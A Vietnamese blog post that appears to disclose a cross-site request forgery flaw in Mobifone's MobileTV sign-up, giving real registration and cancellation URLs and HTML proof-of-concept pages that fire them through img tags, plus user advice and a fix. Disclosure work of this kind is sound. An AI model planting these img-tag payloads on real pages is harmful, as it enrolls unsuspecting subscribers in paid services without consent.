Skip to content

Lỗ hổng bảo mật trong hệ thống của Mobifone khiến khách hàng có bị tự đăng kí dịch vụ MobileTV ngoài ý muốn

by on 14 Tháng Sáu, 2015

Cảnh báo: bài viết có sử dụng những API thật của Mobifone để minh họa. Nếu người xem sử dụng dịch vụ Internet 3G của Mobifone để đọc bài này có thể đã bị đăng kí dịch vụ nếu lỗ hổng bảo mật vẫn chưa được sửa chữa, hãy kiểm tra tin nhắn và hủy dịch vụ được tự động đăng kí nếu có.
Bài viết sử dụng giấy phép Creative Common, có thể được chia sẽ sửa đổivà dùng mục đích thương mại. Tuy nhiên lưu ý gỡ bỏ các API khi đăng bài để tránh gây ảnh hưởng đến người đọc. 

This blog post content vulnerable API request. Becareful when reading this post with Mobifone 3G Internet connection.

=======================================================================

Thông tin về lỗi bảo mật:

Loại lỗ hổng:     Cross-site request forgery

Khả năng khai thác: Rất dễ

Hậu quả: Người dùng bị đăng kí dịch vụ cộng thêm ngoài ý muốn gây mất tiền hàng tháng và không có thể không hay biết.

Cách tránh từ người dùng: Dùng các phần mềm chặn gửi yêu cầu đến tên miền tv.mobifone.com.vn.  Kiểm tra tin nhắn từ điện thoại để xem có được tự động đăng kí hay không. Soạn tin nhắn nội dung      GTGT       gửi 901 để xem các dịch vụ đang sử dụng.

Cách khắc phục lỗi của hệ thống: Thay đổi các đầu API đăng kí từ HTTP GET sang HTTP POST kết hợp với Synchronizer token pattern.

Mô tả chi tiết về lỗi bảo mật:

Lỗ hổng ở trang đăng kí dịch vụ MobileTV của Mobifone. ở bước tiến hành xác nhận đăng kí, sẽ gửi đến một request HTTP GET đến địa chỉ http://tv.mobifone.com.vn/inc/regdone.jsp?code=TV1 để xác nhận mà không cần kiểm tra thêm. Bất kì thông tin nào từ phía người dùng.

Hệ thống của Mobifone. Chỉ thực lấy và xác nhận thuê bao thông qua thông tin kết nối Internet 3G. Sau khi đăng kí thành công sẽ gửi tin nhắn thông báo đến số thuê bao điện thoại.

Lỗ hổng có thể khai thác một cách dễ dàng bằng cách đặt một thẻ ảnh đến đầu API để thực hiện yêu cầu đăng kí:

API Nguy hiểm:

======================

Dangerous API

====================== 

Ngoài ra việc hủy dịch vụ cũng có thể được thực hiện thông qua API:
http://tv.mobifone.com.vn/inc/unreg.jsp?code=TV1

Đoạn API này có thể được chèn vào bất kì nơi nào chấp nhận thẻ tag IMG, người dùng và các phần mềm bảo mật không thể biết đến. Có thể bị lợi dụng để đặt trên các diễn đàn và mạng xã hội có lượng người truy cập cao. Bởi bất kì ai có quyền chèn ảnh. Ngoài ra không chỉ người sử dụng điện thoại ảnh hưởng, nếu máy tính sử dụng kết nối Internet 3G để truy cập vào các trang chứa lỗi này đều có thể bị tấn công.

Trình diễn thử nghiệm lỗ hổng bảo mật:

Để đảm bảo công bằng, sử dụng một máy tính sạch chưa từng truy cập vào Website của Mobifone, không hề có chứa Cookie hay đăng nhập từ trước. Máy tính sử dụng kết nối Internet 3G của Mobifone được phát từ điện thoại.

Truy cập vào 2 website html trên máy với nội dung đơn giản là:

<html>
<body>
<img src=”http://tv.mobifone.com.vn/inc/regdone.jsp?code=TV1″/&gt;
Lỗi bảo mật: Đăng kí dịch vụ.
</body>
</html>

<html>
<body>
<img src=”http://tv.mobifone.com.vn/inc/unreg.jsp?code=TV1″/&gt;
Lỗi bảo mật: Hủy đăng kí dịch vụ.
</body>
</html>

Creative Commons License
This work is licensed under a Creative Commons Attribution 4.0 International License.

Để lại phản hồi

Gửi phản hồi

Mời bạn điền thông tin vào ô dưới đây hoặc kích vào một biểu tượng để đăng nhập:

WordPress.com Logo

Bạn đang bình luận bằng tài khoản WordPress.com Log Out / Thay đổi )

Twitter picture

Bạn đang bình luận bằng tài khoản Twitter Log Out / Thay đổi )

Facebook photo

Bạn đang bình luận bằng tài khoản Facebook Log Out / Thay đổi )

Google+ photo

Bạn đang bình luận bằng tài khoản Google+ Log Out / Thay đổi )

Connecting to %s